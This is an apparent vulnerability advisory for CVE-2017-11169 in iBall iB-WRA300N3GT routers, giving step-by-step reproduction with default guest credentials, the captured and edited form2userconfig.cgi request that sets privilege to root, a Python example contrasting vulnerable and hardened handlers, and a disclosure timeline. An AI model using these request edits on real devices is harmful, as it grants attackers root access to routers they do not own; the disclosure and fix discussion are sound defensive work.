
Privilege Escalation in iBall iB-WRA300N3GT Devices

A privilege escalation flaw in iBall iB-WRA300N3GT routers allows a remote authenticated user holding only a guest (normal-user) account to obtain root privileges by submitting a modified privilege parameter to the user-configuration form. The CGI handler trusts the privilege value sent by the client instead of deriving the permitted privilege from the logged-in session.

Reproduction Steps:

Step 1: Log on to the router with the guest account (default username: guest, password: guest).

Step 2: Go to the Maintenance tab.

Step 3: Click the Password tab in the right-hand panel.

Step 4: Enter a username and password for a new guest user and submit the form.

Step 5: Intercept the resulting HTTP request with a proxy.

Step 6: The captured request looks like the following (the session cookie value is omitted).

====================HTTP Request Sample=======================
   POST /form2userconfig.cgi HTTP/1.1
   Referer: http://192.168.1.1/userconfig.htm?v=1499683514000
   Cookie: SessionID=
   username=test&privilege=0&newpass=hello&confpass=hello&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

Step 7: Change the privilege parameter from 0 to 2 and forward the request.
=====================Edited HTTP Request=======================

   POST /form2userconfig.cgi HTTP/1.1
   Referer: http://192.168.1.1/userconfig.htm?v=1499683514000
   Cookie: SessionID=
   username=test&privilege=2&newpass=hello&confpass=hello&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
A new user "test" is created with root privileges, even though the request was sent from the "guest" account.
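The following is an added example, not code from the original post or from iBall's firmware. It reproduces the request edit from Steps 6 and 7 on the captured form body and contrasts a handler that trusts the client-supplied privilege parameter (the behaviour observed on the device) with a hardened handler that derives the permitted privilege from the caller's session. The Router class, the session handling and the privilege policy (a caller may not grant a privilege above their own, and existing accounts cannot be overwritten) are hypothetical reconstructions; only the form body is taken from the post.

```python
# Added example (not code from the original post or from iBall's firmware).
# Reproduces the Step 6/7 request edit and contrasts a handler that trusts
# the client-supplied privilege with one that authorises from the session.
# Router, the session model and the privilege policy are hypothetical.
from urllib.parse import parse_qs, urlencode

# Privilege values as used in the post: 0 is the guest account, 2 is root.
GUEST, ROOT = 0, 2

# Step 6 request body, copied from the post.
CAPTURED_BODY = ("username=test&privilege=0&newpass=hello&confpass=hello"
                 "&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def escalate_body(body, new_privilege=ROOT):
    """Step 7: rewrite the privilege parameter, leaving the rest untouched."""
    params = parse_form(body)
    params["privilege"] = str(new_privilege)
    return urlencode(params)


class Router:
    """Minimal stand-in for the device's user table (hypothetical)."""

    def __init__(self):
        self.users = {"admin": ROOT, "guest": GUEST}


def vulnerable_add_user(router, session_user, body):
    """Handler modelled on the observed behaviour of form2userconfig.cgi:
    the privilege of the new account is taken straight from the request,
    and the caller's own privilege (session_user) is never consulted."""
    params = parse_form(body)
    if params["newpass"] != params["confpass"]:
        return "password mismatch"
    router.users[params["username"]] = int(params["privilege"])  # client-controlled
    return "ok"


def hardened_add_user(router, session_user, body):
    """Hardened handler (a suggested fix, not iBall's): authorise from the
    session, validate the requested privilege, and cap it at the caller's."""
    caller_priv = router.users.get(session_user)
    if caller_priv is None:
        return "forbidden: no session"
    params = parse_form(body)
    if params["newpass"] != params["confpass"]:
        return "password mismatch"
    try:
        requested = int(params["privilege"])
    except ValueError:
        return "bad request"
    if requested not in (GUEST, ROOT):
        return "bad request"
    if requested > caller_priv:
        return "forbidden: cannot grant a privilege above your own"
    if params["username"] in router.users:
        return "user exists"
    router.users[params["username"]] = requested
    return "ok"


if __name__ == "__main__":
    body = escalate_body(CAPTURED_BODY)
    print("edited body:", body)
    r = Router()
    print("vulnerable:", vulnerable_add_user(r, "guest", body), r.users)
    r = Router()
    print("hardened:  ", hardened_add_user(r, "guest", body), r.users)
```

Run as a script to see the edited body from Step 7 and the two outcomes side by side: the vulnerable handler stores "test" with privilege 2 when called from the guest session, while the hardened handler refuses it and still accepts the original privilege=0 request. The fix is entirely server-side; hiding or disabling the privilege field in the HTML form would not help, since the attacker edits the request after it leaves the browser.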

Affected Product : iBall iB-WRA300N3GT
Firmware Version : iB-WRA300N3GT_1.1.1
Vulnerability Type : Insecure Permissions
Vulnerability Impact : Escalation of Privileges

 Timeline: 
25/05/2017 - Vulnerability Found
05/06/2017 - CVE-2017-11169 assigned
11/06/2017 - Reported to iBall
23/07/2017 - iBall Customer Support Replied(Escalated Internally)
05/08/2017 - No Response
02/09/2017 - No Response
13/11/2017 - Public Disclosure


Notes :

  • The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVE-2017-11169 to this issue. This is an entry on the CVE List, which standardizes names for security problems.
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11169
  • CVE ID: CVE-2017-11169
  • In case of any doubts please contact me on unqdrms [at] gmail [dot] com
